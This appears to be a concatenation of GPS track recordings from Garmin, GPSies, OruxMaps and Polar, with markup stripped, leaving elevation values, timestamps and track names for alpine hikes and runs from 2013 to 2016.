+Garmin Connect
+2016-08-11T16:37:37Z
+
+Prato (Leventina) Bergsteigen
+Alpine Überquerung T6 ll
+
+mountaineering
+
+
+2448.199951171875
+2016-08-11T16:37:37Z
+
+
+
+
+
+2480.0
+2016-08-11T16:39:30Z
+
+
+
+
+
+2496.60009765625
+2016-08-11T16:41:11Z
+
+
+
+
+
+2501.199951171875
+2016-08-11T16:47:50Z
+
+
+
+
+
+2507.199951171875
+2016-08-11T16:48:47Z
+
+
+
+
+
+2483.800048828125
+2016-08-11T16:50:32Z
+
+
+
+
+
+2444.800048828125
+2016-08-11T16:52:45Z
+
+
+
+
+
+2435.60009765625
+2016-08-11T16:53:38Z
+
+
+
+
+
+2425.0
+2016-08-11T16:54:21Z
+
+
+
+
+
+2408.60009765625
+2016-08-11T16:56:06Z
+
+
+
+
+
+2393.60009765625
+2016-08-11T16:58:32Z
+
+
+
+
+
+2399.39990234375
+2016-08-11T16:59:11Z
+
+
+
+
+
+2400.39990234375
+2016-08-11T16:59:54Z
+
+
+
+
+
+2417.39990234375
+2016-08-11T17:00:55Z
+
+
+
+
+
+2483.199951171875
+2016-08-11T17:09:14Z
+
+
+
+
+
+2475.199951171875
+2016-08-11T17:19:10Z
+
+
+
+
+
+2471.0
+2016-08-11T17:21:06Z
+
+
+
+
+
+2474.39990234375
+2016-08-11T17:24:23Z
+
+
+
+
+
+2474.0
+2016-08-11T17:28:51Z
+
+
+
+
+
+2433.800048828125
+2016-08-11T17:32:52Z
+
+
+
+
+
+2422.800048828125
+2016-08-11T17:34:57Z
+
+
+
+
+
+2398.39990234375
+2016-08-11T17:38:21Z
+
+
+
+
+
+2387.199951171875
+2016-08-11T17:40:35Z
+
+
+
+
+
+2374.39990234375
+2016-08-11T17:41:46Z
+
+
+
+
+
+2358.60009765625
+2016-08-11T17:42:51Z
+
+
+
+
+
+2345.0
+2016-08-11T17:43:49Z
+
+
+
+
+
+2316.39990234375
+2016-08-11T17:47:24Z
+
+
+
+
+
+2280.39990234375
+2016-08-11T17:49:26Z
+
+
+
+
+
+2270.60009765625
+2016-08-11T17:52:19Z
+
+
+
+
+
+2262.39990234375
+2016-08-11T17:53:02Z
+
+
+
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Modrava-Lusen
+
+dodovogel
+
+dodovogel on GPSies.com
+GPSiesUserOnWeb
+
+
+Modrava-Lusen on GPSies.com
+trackOnWeb
+2016-08-04T22:46:51Z
+
+one-way trip
+475.0
+12002.813443682486
+982.0
+1262.0
+201.0
+
+Modrava-Lusen on GPSies.com
+
+trackOnWeb
+
+
+983.0
+2010-01-01T00:00:00Z
+
+
+983.0
+2010-01-01T00:00:45Z
+
+
+988.0
+2010-01-01T00:00:59Z
+
+
+1009.0
+2010-01-01T00:01:45Z
+
+
+1049.0
+2010-01-01T00:03:02Z
+
+
+1073.0
+2010-01-01T00:04:15Z
+
+
+1077.0
+2010-01-01T00:04:50Z
+
+
+1081.0
+2010-01-01T00:05:15Z
+
+
+1104.0
+2010-01-01T00:06:44Z
+
+
+1106.0
+2010-01-01T00:07:09Z
+
+
+1128.0
+2010-01-01T00:08:49Z
+
+
+1142.0
+2010-01-01T00:11:42Z
+
+
+1143.0
+2010-01-01T00:12:02Z
+
+
+1140.0
+2010-01-01T00:12:37Z
+
+
+1138.0
+2010-01-01T00:12:54Z
+
+
+1132.0
+2010-01-01T00:13:45Z
+
+
+1129.0
+2010-01-01T00:14:35Z
+
+
+1111.0
+2010-01-01T00:15:56Z
+
+
+1104.0
+2010-01-01T00:16:55Z
+
+
+1096.0
+2010-01-01T00:17:55Z
+
+
+1093.0
+2010-01-01T00:19:11Z
+
+
+1121.0
+2010-01-01T00:21:27Z
+
+
+1139.0
+2010-01-01T00:22:59Z
+
+
+1157.0
+2010-01-01T00:24:19Z
+
+
+1161.0
+2010-01-01T00:24:47Z
+
+
+1167.0
+2010-01-01T00:25:27Z
+
+
+1179.0
+2010-01-01T00:26:16Z
+
+
+1192.0
+2010-01-01T00:27:29Z
+
+
+1208.0
+2010-01-01T00:28:15Z
+
+
+1201.0
+2010-01-01T00:28:43Z
+
+
+1204.0
+2010-01-01T00:29:50Z
+
+
+1208.0
+2010-01-01T00:30:14Z
+
+
+1212.0
+2010-01-01T00:30:44Z
+
+
+1222.0
+2010-01-01T00:31:49Z
+
+
+1232.0
+2010-01-01T00:32:33Z
+
+
+1234.0
+2010-01-01T00:33:01Z
+
+
+1243.0
+2010-01-01T00:33:46Z
+
+
+1254.0
+2010-01-01T00:34:25Z
+
+
+1262.0
+2010-01-01T00:35:33Z
+
+
+1253.0
+2010-01-01T00:36:28Z
+
+
+1249.0
+2010-01-01T00:37:22Z
+
+
+1239.0
+2010-01-01T00:38:31Z
+
+
+1228.0
+2010-01-01T00:39:07Z
+
+
+1211.0
+2010-01-01T00:39:59Z
+
+
+1164.0
+2010-01-01T00:42:16Z
+
+
+1152.0
+2010-01-01T00:43:00Z
+
+
+1148.0
+2010-01-01T00:43:23Z
+
+
+1146.0
+2010-01-01T00:44:13Z
+
+
+1146.0
+2010-01-01T00:44:29Z
+
+
+1142.0
+2010-01-01T00:45:09Z
+
+
+1149.0
+2010-01-01T00:46:46Z
+
+
+1142.0
+2010-01-01T00:47:22Z
+
+
+1141.0
+2010-01-01T00:47:39Z
+
+
+1146.0
+2010-01-01T00:49:21Z
+
+
+1147.0
+2010-01-01T00:50:36Z
+
+
+1153.0
+2010-01-01T00:51:19Z
+
+
+1152.0
+2010-01-01T00:51:37Z
+
+
+1153.0
+2010-01-01T00:52:01Z
+
+
+1165.0
+2010-01-01T00:55:39Z
+
+
+1169.0
+2010-01-01T00:56:21Z
+
+
+1170.0
+2010-01-01T00:56:33Z
+
+
+1174.0
+2010-01-01T00:57:03Z
+
+
+1179.0
+2010-01-01T00:57:56Z
+
+
+1190.0
+2010-01-01T00:59:25Z
+
+
+1196.0
+2010-01-01T00:59:47Z
+
+
+1198.0
+2010-01-01T01:00:14Z
+
+
+1199.0
+2010-01-01T01:00:36Z
+
+
+1207.0
+2010-01-01T01:01:29Z
+
+
+1205.0
+2010-01-01T01:02:35Z
+
+
+1204.0
+2010-01-01T01:03:22Z
+
+
+1193.0
+2010-01-01T01:06:10Z
+
+
+1186.0
+2010-01-01T01:06:36Z
+
+
+1180.0
+2010-01-01T01:07:04Z
+
+
+1181.0
+2010-01-01T01:07:20Z
+
+
+1257.0
+2010-01-01T01:12:01Z
+ "
+"
+
+
+2016-09-23-13-04-51
+
+
+
+
+2016-09-23-13-04-51 on GPSies.com
+2016-10-18T19:01:04Z
+
+2016-09-23-13-04-51 on GPSies.com
+
+
+
+485.0
+2016-09-23T13:04:51Z
+
+
+508.0
+2016-09-23T13:09:19Z
+
+
+532.0
+2016-09-23T13:11:13Z
+
+
+558.0
+2016-09-23T13:13:23Z
+
+
+562.0
+2016-09-23T13:13:58Z
+
+
+569.0
+2016-09-23T13:17:51Z
+
+
+632.0
+2016-09-23T13:24:24Z
+
+
+669.0
+2016-09-23T13:31:37Z
+
+
+796.0
+2016-09-23T13:53:29Z
+
+
+821.0
+2016-09-23T13:57:17Z
+
+
+842.0
+2016-09-23T14:02:45Z
+
+
+860.0
+2016-09-23T14:05:52Z
+
+
+881.0
+2016-09-23T14:07:32Z
+
+
+902.0
+2016-09-23T14:10:50Z
+
+
+955.0
+2016-09-23T14:16:15Z
+
+
+1014.0
+2016-09-23T14:26:53Z
+
+
+1031.0
+2016-09-23T14:29:43Z
+
+
+1025.0
+2016-09-23T14:33:19Z
+
+
+1022.0
+2016-09-23T14:35:48Z
+
+
+1029.0
+2016-09-23T14:36:43Z
+
+
+1052.0
+2016-09-23T14:41:52Z
+
+
+1067.0
+2016-09-23T14:45:00Z
+
+
+1075.0
+2016-09-23T14:46:46Z
+
+
+1060.0
+2016-09-23T14:50:29Z
+
+
+1047.0
+2016-09-23T14:51:46Z
+
+
+1028.0
+2016-09-23T14:53:29Z
+
+
+1014.0
+2016-09-23T14:54:42Z
+
+
+1000.0
+2016-09-23T14:56:04Z
+
+
+989.0
+2016-09-23T14:57:25Z
+
+
+983.0
+2016-09-23T14:58:12Z
+
+
+977.0
+2016-09-23T15:00:19Z
+
+
+975.0
+2016-09-23T15:00:57Z
+
+
+970.0
+2016-09-23T15:01:47Z
+
+
+967.0
+2016-09-23T15:03:13Z
+
+
+964.0
+2016-09-23T15:04:02Z
+
+
+972.0
+2016-09-23T16:23:06Z
+
+
+972.0
+2016-09-23T16:23:49Z
+
+
+969.0
+2016-09-23T16:24:24Z
+
+
+957.0
+2016-09-23T16:26:00Z
+
+
+936.0
+2016-09-23T16:28:18Z
+
+
+928.0
+2016-09-23T16:29:09Z
+
+
+903.0
+2016-09-23T16:31:24Z
+
+
+867.0
+2016-09-23T16:34:36Z
+
+
+819.0
+2016-09-23T16:39:37Z
+
+
+807.0
+2016-09-23T16:41:02Z
+
+
+782.0
+2016-09-23T16:43:28Z
+
+
+768.0
+2016-09-23T16:45:08Z
+
+
+754.0
+2016-09-23T16:46:13Z
+
+
+750.0
+2016-09-23T16:46:40Z
+
+
+731.0
+2016-09-23T16:48:15Z
+
+
+709.0
+2016-09-23T16:49:52Z
+
+
+693.0
+2016-09-23T16:51:15Z
+
+
+659.0
+2016-09-23T16:54:57Z
+
+
+640.0
+2016-09-23T16:56:20Z
+
+
+635.0
+2016-09-23T16:56:50Z
+
+
+625.0
+2016-09-23T16:57:46Z
+
+
+617.0
+2016-09-23T16:58:39Z
+
+
+605.0
+2016-09-23T16:59:55Z
+
+
+600.0
+2016-09-23T17:00:27Z
+
+
+586.0
+2016-09-23T17:03:22Z
+
+
+573.0
+2016-09-23T17:06:38Z
+
+
+560.0
+2016-09-23T17:07:46Z
+
+
+556.0
+2016-09-23T17:08:10Z
+
+
+543.0
+2016-09-23T17:09:16Z
+
+
+536.0
+2016-09-23T17:09:55Z
+
+
+528.0
+2016-09-23T17:10:28Z
+
+
+507.0
+2016-09-23T17:12:07Z
+
+
+488.0
+2016-09-23T17:14:21Z
+
+
+484.0
+2016-09-23T17:17:20Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-05-31T12:16:26Z
+
+2015-05-31 14:15:26-Trail Run
+
+
+
+
+
+491.37
+2015-05-31T12:03:59Z
+
+
+490.41
+2015-05-31T12:04:25Z
+
+
+497.62
+2015-05-31T12:05:47Z
+
+
+505.79
+2015-05-31T12:06:09Z
+
+
+506.27
+2015-05-31T12:07:05Z
+
+
+505.79
+2015-05-31T12:07:12Z
+
+
+512.04
+2015-05-31T12:07:45Z
+
+
+510.12
+2015-05-31T12:08:13Z
+
+
+513.96
+2015-05-31T12:08:44Z
+
+
+520.21
+2015-05-31T12:10:05Z
+
+
+517.81
+2015-05-31T12:10:20Z
+
+
+502.91
+2015-05-31T12:10:54Z
+
+
+515.88
+2015-05-31T12:12:03Z
+
+
+509.64
+2015-05-31T12:12:29Z
+
+
+512.04
+2015-05-31T12:12:46Z
+
+
+516.37
+2015-05-31T12:13:13Z
+
+
+508.67
+2015-05-31T12:14:03Z
+
+
+499.06
+2015-05-31T12:14:40Z
+
+
+492.33
+2015-05-31T12:15:20Z
+ "
+"
+
+
+saukarkopf
+
+
+
+
+
+OruxMaps
+2015-10-28T13:11:04Z
+
+
+saukarkopf
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: saukarkopf</h2><br /><p>Startzeit: 10/28/2015 14:11</p><p>Zielzeit: 10/28/2015 15:47</p><p>Strecke: 4,3km (01:36)</p><p>Bewegungszeit: 01:03</p><p>Ø-Geschwindigkeit: 2,7km/h</p><p>Netto-Geschwindigkeit: 4,1km/h</p><p>Max. Geschwindigkeit: 30,2km/h</p><p>Minimale Höhe: 1229m</p><p>Maximale Höhe: 2047m</p><p>Steig-Geschw.: 1730,7m/h</p><p>Sink-Geschw.: -591,3m/h</p><p>Aufstieg: 88m</p><p>Abstieg: -899m</p><p>Steigzeit: 00:03</p><p>Sinkzeit: 01:31</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+2044.62
+2015-10-28T13:11:06Z
+
+
+2032.66
+2015-10-28T13:22:19Z
+
+
+2026.01
+2015-10-28T13:24:09Z
+
+
+1991.23
+2015-10-28T13:26:52Z
+
+
+1971.14
+2015-10-28T13:28:12Z
+
+
+1946.58
+2015-10-28T13:30:01Z
+
+
+1898.55
+2015-10-28T13:34:56Z
+
+
+1880.12
+2015-10-28T13:36:49Z
+
+
+1855.15
+2015-10-28T13:38:49Z
+
+
+1852.57
+2015-10-28T13:39:46Z
+
+
+1845.26
+2015-10-28T13:41:28Z
+
+
+1837.64
+2015-10-28T13:42:31Z
+
+
+1836.76
+2015-10-28T13:42:48Z
+
+
+1820.13
+2015-10-28T13:44:11Z
+
+
+1816.62
+2015-10-28T13:45:33Z
+
+
+1784.65
+2015-10-28T13:49:16Z
+
+
+1777.01
+2015-10-28T13:50:03Z
+
+
+1771.16
+2015-10-28T13:51:12Z
+
+
+1778.14
+2015-10-28T13:52:20Z
+
+
+1753.26
+2015-10-28T13:54:20Z
+
+
+1736.24
+2015-10-28T13:55:09Z
+
+
+1732.01
+2015-10-28T13:55:31Z
+
+
+1709.11
+2015-10-28T13:57:01Z
+
+
+1695.14
+2015-10-28T13:58:05Z
+
+
+1679.63
+2015-10-28T13:58:58Z
+
+
+1681.14
+2015-10-28T13:59:17Z
+
+
+1672.26
+2015-10-28T13:59:33Z
+
+
+1653.5
+2015-10-28T14:00:33Z
+
+
+1648.52
+2015-10-28T14:00:48Z
+
+
+1643.63
+2015-10-28T14:01:30Z
+
+
+1619.57
+2015-10-28T14:04:00Z
+
+
+1596.14
+2015-10-28T14:04:44Z
+
+
+1587.76
+2015-10-28T14:05:03Z
+
+
+1565.29
+2015-10-28T14:05:46Z
+
+
+1559.51
+2015-10-28T14:06:52Z
+
+
+1574.1
+2015-10-28T14:06:57Z
+
+
+1571.36
+2015-10-28T14:07:04Z
+
+
+1528.64
+2015-10-28T14:08:50Z
+
+
+1511.99
+2015-10-28T14:10:24Z
+
+
+1494.96
+2015-10-28T14:12:39Z
+
+
+1481.17
+2015-10-28T14:13:46Z
+
+
+1479.23
+2015-10-28T14:14:12Z
+
+
+1475.77
+2015-10-28T14:14:43Z
+
+
+1470.15
+2015-10-28T14:14:58Z
+
+
+1460.7
+2015-10-28T14:15:42Z
+
+
+1450.76
+2015-10-28T14:16:24Z
+
+
+1447.2
+2015-10-28T14:17:22Z
+
+
+1487.76
+2015-10-28T14:17:26Z
+
+
+1475.95
+2015-10-28T14:17:27Z
+
+
+1440.38
+2015-10-28T14:18:20Z
+
+
+1389.14
+2015-10-28T14:33:34Z
+
+
+1386.14
+2015-10-28T14:33:47Z
+
+
+1355.17
+2015-10-28T14:35:35Z
+
+
+1302.74
+2015-10-28T14:38:38Z
+
+
+1285.14
+2015-10-28T14:39:24Z
+
+
+1286.02
+2015-10-28T14:39:41Z
+
+
+1282.17
+2015-10-28T14:39:55Z
+
+
+1264.51
+2015-10-28T14:41:04Z
+
+
+1255.01
+2015-10-28T14:41:38Z
+
+
+1249.13
+2015-10-28T14:42:04Z
+
+
+1246.63
+2015-10-28T14:42:32Z
+
+
+1236.89
+2015-10-28T14:44:10Z
+
+
+1238.01
+2015-10-28T14:44:47Z
+
+
+1235.79
+2015-10-28T14:45:15Z
+
+
+1229.28
+2015-10-28T14:46:31Z
+
+
+1230.03
+2015-10-28T14:47:14Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-06-26T17:32:37Z
+
+2015-06-26 19:32:35
+
+
+
+
+
+
+1554.85
+2015-06-26T14:11:52Z
+
+
+1567.99
+2015-06-26T14:13:30Z
+
+
+1588.43
+2015-06-26T14:15:06Z
+
+
+1606.56
+2015-06-26T14:16:34Z
+
+
+1638.18
+2015-06-26T14:19:09Z
+
+
+1656.6
+2015-06-26T14:20:33Z
+
+
+1675.01
+2015-06-26T14:22:03Z
+
+
+1716.25
+2015-06-26T14:35:03Z
+
+
+1740.64
+2015-06-26T14:47:07Z
+
+
+1776.18
+2015-06-26T14:58:44Z
+
+
+1803.65
+2015-06-26T15:08:21Z
+
+
+1858.58
+2015-06-26T15:40:55Z
+
+
+1820.76
+2015-06-26T15:43:54Z
+
+
+1809.8
+2015-06-26T15:45:06Z
+
+
+1790.17
+2015-06-26T15:48:14Z
+
+
+1753.58
+2015-06-26T15:56:37Z
+
+
+1737.96
+2015-06-26T16:01:53Z
+
+
+1750.02
+2015-06-26T16:04:43Z
+
+
+1694.74
+2015-06-26T16:08:56Z
+
+
+1688.05
+2015-06-26T16:14:26Z
+
+
+1710.9
+2015-06-26T16:19:20Z
+
+
+1753.56
+2015-06-26T16:24:44Z
+
+
+1788.81
+2015-06-26T16:30:32Z
+
+
+1792.09
+2015-06-26T16:31:59Z
+
+
+1809.55
+2015-06-26T16:37:45Z
+
+
+1782.96
+2015-06-26T16:39:33Z
+
+
+1756.93
+2015-06-26T16:40:49Z
+
+
+1705.65
+2015-06-26T16:44:05Z
+
+
+1673.04
+2015-06-26T16:47:35Z
+
+
+1633.79
+2015-06-26T16:49:46Z
+
+
+1618.6
+2015-06-26T16:50:50Z
+
+
+1598.47
+2015-06-26T16:52:00Z
+
+
+1561.52
+2015-06-26T16:54:37Z
+
+
+1545.96
+2015-06-26T16:58:32Z
+
+
+1548.05
+2015-06-26T16:59:36Z
+
+
+1548.54
+2015-06-26T17:00:50Z
+
+
+1550.35
+2015-06-26T17:01:34Z
+
+
+1539.78
+2015-06-26T17:04:43Z
+
+
+1501.15
+2015-06-26T17:06:57Z
+
+
+1484.71
+2015-06-26T17:08:00Z
+
+
+1474.5
+2015-06-26T17:09:09Z
+
+
+1461.02
+2015-06-26T17:10:21Z
+
+
+1441.75
+2015-06-26T17:11:31Z
+
+
+1424.05
+2015-06-26T17:12:48Z
+
+
+1404.72
+2015-06-26T17:14:06Z
+
+
+1355.26
+2015-06-26T17:17:10Z
+
+
+1332.77
+2015-06-26T17:18:16Z
+
+
+1309.39
+2015-06-26T17:19:18Z
+
+
+1295.8
+2015-06-26T17:20:11Z
+
+
+1280.64
+2015-06-26T17:21:08Z
+
+
+1227.09
+2015-06-26T17:26:41Z
+
+
+1215.43
+2015-06-26T17:27:26Z
+
+
+1206.31
+2015-06-26T17:28:14Z
+
+
+1195.76
+2015-06-26T17:28:58Z
+
+
+1173.85
+2015-06-26T17:30:38Z
+
+
+1169.01
+2015-06-26T17:31:30Z
+
+
+1169.98
+2015-06-26T17:32:32Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+Polar
+
+
+
+2016-05-08T10:06:04Z
+
+
+
+
+710.0
+2016-05-08T10:06:19Z
+
+
+692.0
+2016-05-08T10:09:16Z
+
+
+684.0
+2016-05-08T10:11:01Z
+
+
+703.0
+2016-05-08T10:13:00Z
+
+
+708.0
+2016-05-08T10:13:42Z
+
+
+719.0
+2016-05-08T10:14:54Z
+
+
+729.0
+2016-05-08T10:17:31Z
+
+
+741.0
+2016-05-08T10:19:03Z
+
+
+754.0
+2016-05-08T10:20:56Z
+
+
+767.0
+2016-05-08T10:22:10Z
+
+
+778.0
+2016-05-08T10:23:39Z
+
+
+790.0
+2016-05-08T10:24:26Z
+
+
+791.0
+2016-05-08T10:25:13Z
+
+
+807.0
+2016-05-08T10:27:37Z
+
+
+824.0
+2016-05-08T10:28:50Z
+
+
+824.0
+2016-05-08T10:30:01Z
+
+
+838.0
+2016-05-08T10:32:43Z
+
+
+854.0
+2016-05-08T10:33:58Z
+
+
+898.0
+2016-05-08T10:39:08Z
+
+
+936.0
+2016-05-08T10:44:28Z
+
+
+963.0
+2016-05-08T10:47:47Z
+
+
+1013.0
+2016-05-08T10:56:00Z
+
+
+1043.0
+2016-05-08T10:59:24Z
+
+
+1082.0
+2016-05-08T11:06:36Z
+
+
+1160.0
+2016-05-08T11:18:11Z
+
+
+1196.0
+2016-05-08T11:23:26Z
+
+
+1252.0
+2016-05-08T11:31:37Z
+
+
+1314.0
+2016-05-08T11:42:39Z
+
+
+1354.0
+2016-05-08T11:50:24Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-04-25T16:07:47Z
+
+2015-04-25 18:07:46
+
+
+
+
+
+
+915.08
+2015-04-25T13:58:46Z
+
+
+915.15
+2015-04-25T14:02:22Z
+
+
+913.73
+2015-04-25T14:04:45Z
+
+
+915.26
+2015-04-25T14:05:55Z
+
+
+915.58
+2015-04-25T14:06:54Z
+
+
+915.35
+2015-04-25T14:08:45Z
+
+
+913.41
+2015-04-25T14:09:35Z
+
+
+910.84
+2015-04-25T14:10:24Z
+
+
+907.21
+2015-04-25T14:12:02Z
+
+
+901.24
+2015-04-25T14:13:39Z
+
+
+900.32
+2015-04-25T14:14:26Z
+
+
+895.23
+2015-04-25T14:16:16Z
+
+
+894.49
+2015-04-25T14:17:08Z
+
+
+893.24
+2015-04-25T14:18:04Z
+
+
+891.93
+2015-04-25T14:19:01Z
+
+
+889.37
+2015-04-25T14:19:57Z
+
+
+897.16
+2015-04-25T14:21:12Z
+
+
+883.05
+2015-04-25T14:29:59Z
+
+
+887.68
+2015-04-25T14:30:56Z
+
+
+876.95
+2015-04-25T14:32:02Z
+
+
+883.58
+2015-04-25T14:35:11Z
+
+
+894.38
+2015-04-25T14:36:06Z
+
+
+897.2
+2015-04-25T14:36:57Z
+
+
+897.14
+2015-04-25T14:39:36Z
+
+
+911.03
+2015-04-25T14:50:14Z
+
+
+892.68
+2015-04-25T14:55:26Z
+
+
+897.14
+2015-04-25T14:56:23Z
+
+
+914.49
+2015-04-25T14:58:54Z
+
+
+923.18
+2015-04-25T15:00:16Z
+
+
+932.36
+2015-04-25T15:01:15Z
+
+
+941.8
+2015-04-25T15:02:27Z
+
+
+941.14
+2015-04-25T15:04:28Z
+
+
+940.77
+2015-04-25T15:34:57Z
+
+
+932.9
+2015-04-25T15:35:49Z
+
+
+912.77
+2015-04-25T15:37:34Z
+
+
+889.78
+2015-04-25T15:38:52Z
+
+
+894.47
+2015-04-25T15:39:54Z
+
+
+899.58
+2015-04-25T15:43:20Z
+
+
+897.6
+2015-04-25T15:44:09Z
+
+
+893.07
+2015-04-25T15:45:07Z
+
+
+908.36
+2015-04-25T15:46:17Z
+
+
+920.33
+2015-04-25T15:47:25Z
+
+
+934.34
+2015-04-25T15:48:41Z
+
+
+944.04
+2015-04-25T15:49:56Z
+
+
+946.27
+2015-04-25T15:52:00Z
+
+
+947.17
+2015-04-25T15:53:02Z
+
+
+944.1
+2015-04-25T15:55:11Z
+
+
+934.28
+2015-04-25T15:57:33Z
+
+
+931.21
+2015-04-25T15:58:30Z
+
+
+922.95
+2015-04-25T15:59:23Z
+
+
+918.43
+2015-04-25T16:00:41Z
+
+
+916.12
+2015-04-25T16:01:35Z
+
+
+918.89
+2015-04-25T16:02:40Z
+
+
+914.56
+2015-04-25T16:03:31Z
+
+
+912.89
+2015-04-25T16:04:30Z
+
+
+920.74
+2015-04-25T16:06:26Z
+
+
+915.86
+2015-04-25T16:07:39Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2013-10-03T10:34:01Z
+
+03-OKT-13 12:34:00 PM
+
+
+
+
+
+929.25
+2013-10-03T08:42:04Z
+
+
+919.64
+2013-10-03T08:42:49Z
+
+
+911.95
+2013-10-03T08:43:16Z
+
+
+917.72
+2013-10-03T08:45:16Z
+
+
+931.17
+2013-10-03T08:46:18Z
+
+
+940.31
+2013-10-03T08:48:32Z
+
+
+934.06
+2013-10-03T08:49:33Z
+
+
+933.58
+2013-10-03T08:50:23Z
+
+
+933.58
+2013-10-03T08:50:53Z
+
+
+934.06
+2013-10-03T08:51:27Z
+
+
+937.9
+2013-10-03T08:51:43Z
+
+
+941.27
+2013-10-03T08:52:43Z
+
+
+966.74
+2013-10-03T08:53:29Z
+
+
+966.74
+2013-10-03T08:54:21Z
+
+
+966.74
+2013-10-03T08:55:14Z
+
+
+967.22
+2013-10-03T08:56:36Z
+
+
+970.59
+2013-10-03T08:57:16Z
+
+
+979.24
+2013-10-03T08:57:44Z
+
+
+980.68
+2013-10-03T08:59:15Z
+
+
+989.81
+2013-10-03T08:59:38Z
+
+
+992.22
+2013-10-03T09:02:41Z
+
+
+1000.39
+2013-10-03T09:03:32Z
+
+
+1006.16
+2013-10-03T09:05:20Z
+
+
+1007.12
+2013-10-03T09:07:10Z
+
+
+1008.08
+2013-10-03T09:09:42Z
+
+
+1010.0
+2013-10-03T09:14:43Z
+
+
+1010.0
+2013-10-03T09:16:17Z
+
+
+1010.48
+2013-10-03T09:17:18Z
+
+
+1011.44
+2013-10-03T09:19:13Z
+
+
+1012.41
+2013-10-03T09:20:57Z
+
+
+1013.37
+2013-10-03T09:22:44Z
+
+
+1014.33
+2013-10-03T09:23:33Z
+
+
+1019.62
+2013-10-03T09:26:20Z
+
+
+1024.42
+2013-10-03T09:28:18Z
+
+
+1030.67
+2013-10-03T09:31:41Z
+
+
+1033.55
+2013-10-03T09:32:06Z
+
+
+1236.87
+2013-10-03T09:33:33Z
+
+
+1258.98
+2013-10-03T09:35:33Z
+
+
+1308.97
+2013-10-03T09:41:37Z
+
+
+1324.83
+2013-10-03T09:43:54Z
+
+
+1343.1
+2013-10-03T09:46:19Z
+
+
+1385.4
+2013-10-03T09:48:26Z
+
+
+1375.78
+2013-10-03T09:49:58Z
+
+
+1358.0
+2013-10-03T09:51:17Z
+
+
+1422.89
+2013-10-03T09:52:52Z
+
+
+1428.18
+2013-10-03T09:58:43Z
+
+
+1451.73
+2013-10-03T10:33:53Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-03-01T09:45:20Z
+
+
+Aktueller Track: 28 FEB 2015 11:42
+
+
+
+
+
+
+163.56
+2015-02-28T10:43:15Z
+
+
+210.71875
+
+
+210.34765625
+
+
+209.74609375
+
+
+207.3
+2015-02-28T10:45:30Z
+
+
+207.3
+2015-02-28T10:47:34Z
+
+
+205.38
+2015-02-28T10:50:27Z
+
+
+204.42
+2015-02-28T10:51:01Z
+
+
+204.42
+2015-02-28T10:52:11Z
+
+
+204.42
+2015-02-28T10:53:23Z
+
+
+204.42
+2015-02-28T10:54:54Z
+
+
+202.98
+2015-02-28T10:55:51Z
+
+
+204.42
+2015-02-28T10:57:49Z
+
+
+205.38
+2015-02-28T10:59:56Z
+
+
+205.86
+2015-02-28T11:01:35Z
+
+
+206.34
+2015-02-28T11:03:36Z
+
+
+206.34
+2015-02-28T11:06:32Z
+
+
+205.38
+2015-02-28T11:07:31Z
+
+
+206.34
+2015-02-28T11:08:57Z
+
+
+206.34
+2015-02-28T11:10:12Z
+
+
+207.78
+2015-02-28T11:13:36Z
+
+
+207.78
+2015-02-28T11:15:25Z
+
+
+208.74
+2015-02-28T11:18:43Z
+
+
+210.19
+2015-02-28T11:22:23Z
+
+
+213.07
+2015-02-28T11:26:01Z
+
+
+219.32
+2015-02-28T11:27:45Z
+
+
+228.93
+2015-02-28T11:30:20Z
+
+
+230.85
+2015-02-28T11:32:15Z
+
+
+229.89
+2015-02-28T11:35:41Z
+
+
+231.33
+2015-02-28T11:36:47Z
+
+
+233.74
+2015-02-28T11:39:07Z
+
+
+205.1796875
+
+
+243.98046875
+
+
+245.4375
+
+
+239.6796875
+
+
+245.375
+
+
+243.61328125
+
+
+222.984375
+
+
+227.515625
+
+
+233.125
+
+
+230.2109375
+
+
+220.27734375
+
+
+218.921875
+
+
+218.828125
+
+
+224.8671875
+
+
+214.27734375
+
+
+211.44140625
+
+
+208.79296875
+
+
+207.01953125
+
+
+204.8828125
+
+
+203.6015625
+
+
+203.10546875
+
+
+203.8203125
+
+
+203.64453125
+
+
+203.96875
+
+
+204.41015625
+
+
+205.125
+
+
+205.23046875
+
+
+205.75390625
+
+
+206.0390625
+
+
+207.93359375
+
+
+206.9453125
+
+
+244.79
+2015-02-28T12:01:17Z
+
+
+249.12
+2015-02-28T12:04:33Z
+
+
+249.6
+2015-02-28T12:08:29Z
+
+
+249.12
+2015-02-28T12:10:54Z
+
+
+247.68
+2015-02-28T12:11:37Z
+
+
+245.27
+2015-02-28T12:12:30Z
+
+
+243.83
+2015-02-28T12:13:53Z
+
+
+238.06
+2015-02-28T12:17:10Z
+
+
+234.7
+2015-02-28T12:17:45Z
+
+
+224.12
+2015-02-28T12:19:41Z
+
+
+220.28
+2015-02-28T12:21:43Z
+
+
+242.39
+2015-02-28T14:00:19Z
+ "
+"
+
+
+osset
+
+
+1215.78
+2014-12-20T09:47:32Z
+
+1218.99
+2014-12-20T09:48:08Z
+
+1225.44
+2014-12-20T09:49:40Z
+
+1234.05
+2014-12-20T09:50:42Z
+
+1249.36
+2014-12-20T09:52:34Z
+
+1255.0
+2014-12-20T09:53:24Z
+
+1266.35
+2014-12-20T09:54:55Z
+
+1268.98
+2014-12-20T09:55:16Z
+
+1277.36
+2014-12-20T09:56:20Z
+
+1287.09
+2014-12-20T09:57:46Z
+
+1298.14
